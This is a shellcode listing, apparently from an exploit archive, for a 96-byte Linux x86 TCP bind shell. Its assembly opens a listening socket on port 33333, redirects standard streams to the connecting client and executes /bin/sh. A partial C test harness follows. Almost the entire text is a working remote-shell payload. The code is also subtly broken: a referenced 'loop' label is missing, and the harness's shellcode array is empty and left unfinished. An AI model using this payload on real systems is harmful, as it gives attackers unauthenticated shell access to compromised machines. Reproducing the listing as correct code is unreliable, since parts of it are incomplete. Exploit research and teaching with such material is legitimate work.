Shellcode - Linux/x86 - TCP Bind Shell (96 bytes)

2015-03-16 12:05:09

* Linux x86 - TCP Bind Shell - 96 bytes
* Author: xmgv
* Details:

global _start

section .text

xor ebx, ebx ; zero out ebx
mul ebx ; zero out eax, edx

; socket(AF_INET, SOCK_STREAM, 0);
mov al, 102 ; socketcall()
mov bl, 1 ; socket()
push edx ; protocol
push ebx ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()

; eax contains the newly created socket
mov esi, eax

; bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
mov al, 102 ; socketcall()
inc ebx ; bind() - 2
push edx ; INADDR_ANY
push word 0x3582 ; port
push word bx ; AF_INET
mov ecx, esp ; point to the structure
push 16 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()

; listen(sockfd, backlog);
mov al, 102 ; socketcall()
mov bl, 4 ; listen()
push edx ; backlog
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()

; accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size);
mov al, 102 ; socketcall()
mov bl, 5 ; accept()
push edx ; zero addrlen
push edx ; null sockaddr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()

; eax contains the descriptor for the accepted socket
xchg ebx, eax

xor ecx, ecx ; zero out ecx
mov cl, 2 ; initialize counter

; dup2(connfd, 0);
mov al, 63 ; dup2()
int 0x80
dec ecx
jns loop

; execve(“/bin/sh”, [“/bin/sh”, NULL], NULL);
xchg eax, edx
push eax ; push null bytes (terminate string)
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp ; load address of /bin/sh
push eax ; null terminator
push ebx ; push address of /bin/sh
mov ecx, esp ; load array address
push eax ; push null terminator
mov edx, esp ; empty envp array
mov al, 11 ; execve()
int 0x80 ; call execve()

#include <stdio.h>
#include <string.h>

#define PORT_NUMBER "\x82\x35" // 33333

unsigned char code[] =

int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;


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